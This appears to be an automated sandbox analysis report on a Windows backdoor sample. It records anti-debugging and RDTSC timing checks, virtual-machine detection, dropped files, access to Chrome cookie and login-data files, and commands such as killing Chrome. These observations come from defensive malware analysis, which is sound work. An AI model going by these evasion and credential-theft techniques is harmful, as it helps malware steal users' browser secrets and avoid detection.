Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE34h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C98FED9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE35h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C990039h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE32h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE30h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE36h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C98FE2Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exeRDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_004EFAF0 rdtsc 0_2_004EFAF0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00463680
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,2_2_10019780
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_100204C0 2_2_100204C0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe TID: 6576 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6928 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6992 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,0_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,0_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\
Source: 6272167835D47591.exe, 00000004.00000002.279544410.0000000002B39000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q
Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.266653982.0000000002B34000.00000004.00000040.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: ecv37E8.tmp.9.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20210130T013815Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3a4d640dea36471a8ac5b7161018101b&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=838503&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=838503&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 6272167835D47591.exe, 00000002.00000002.349129349.0000000000BB9000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}B=3s
Source: C:\Users\user\AppData\Roaming\1611970727133.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,2_2_10019FF0
Hides threads from debuggers
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Process queried: DebugFlags
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_004EFAF0 rdtsc 0_2_004EFAF0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1001A010 IsDebuggerPresent,2_2_1001A010
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,0_2_00414280
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h] 2_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h] 2_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h] 2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h] 2_2_10019ED0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_004EE116 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,InterlockedPopEntrySList,VirtualAlloc,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,0_2_004EE116
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_0040D290 EnterCriticalSection,std::_Xinvalid_argument,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,0_2_0040D290
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_0040D340 GetCurrentThreadId,SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,0_2_0040D340
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_0040D300 SetUnhandledExceptionFilter,__set_purecall_handler,__set_purecall_handler,LeaveCriticalSection,0_2_0040D300
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,2_2_10015354
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,2_2_10015376
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,2_2_10018413
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 25_2_00B1461F SetUnhandledExceptionFilter,25_2_00B1461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 25_2_00B11C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00B11C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 25_2_00B1373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00B1373A
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 25_2_00B1631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_00B1631F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,2_2_1001A0F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_00411380 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00411380
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_1001779F cpuid 2_2_1001779F
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: _memset,RegCloseKey,_memset,GetLocaleInfoW,0_2_00443060
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: GetLocaleInfoA,2_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: GetLocaleInfoA,25_2_00B17189
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,2_2_10019780
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_004415F0 GetSystemTime,RegSetValueExW,0_2_004415F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_004C8360 LookupAccountNameW,GetLastError,LookupAccountNameW,CopySid,0_2_004C8360
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 0_2_00463240 GetVersionExW,0_2_00463240
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Replication Through Removable Media 1 | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Peripheral Device Discovery 11 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 2 | Valid Accounts 1 | Valid Accounts 1 | Obfuscated Files or Information 2 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Browser Extensions 1 | Access Token Manipulation 1 | Install Root Certificate 2 | NTDS | File and Directory Discovery 3 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Bootkit 1 | Process Injection 11 | Software Packing 1 | LSA Secrets | System Information Discovery 157 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading 1 | Cached Domain Credentials | Query Registry 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading 1 | DCSync | Security Software Discovery 561 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 1 | Proc Filesystem | Virtualization/Sandbox Evasion 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Process Discovery 3 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Virtualization/Sandbox Evasion 13 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 11 | Input Capture | Remote System Discovery 11 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Bootkit 1 | Keylogging | System Network Configuration Discovery 11 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery

Behavior Graph

[Behavior graph image not reproduced. Behavior Graph ID: 346123, Sample: N1yprTBBXs.exe, Startdate: 29/01/2021, Architecture: WINDOWS, Score: 93]


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
N1yprTBBXs.exe | 38% | Virustotal |  | Browse
N1yprTBBXs.exe | 22% | Metadefender |  | Browse
N1yprTBBXs.exe | 59% | ReversingLabs | Win32.Backdoor.Poison |
N1yprTBBXs.exe | 100% | Joe Sandbox ML |  |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe | 100% | Joe Sandbox ML |  |
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe | 22% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe | 59% | ReversingLabs | Win32.Backdoor.Poison |
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | 0% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\MSI1983.tmp | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 0% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |  | Browse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |  |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |  | Browse
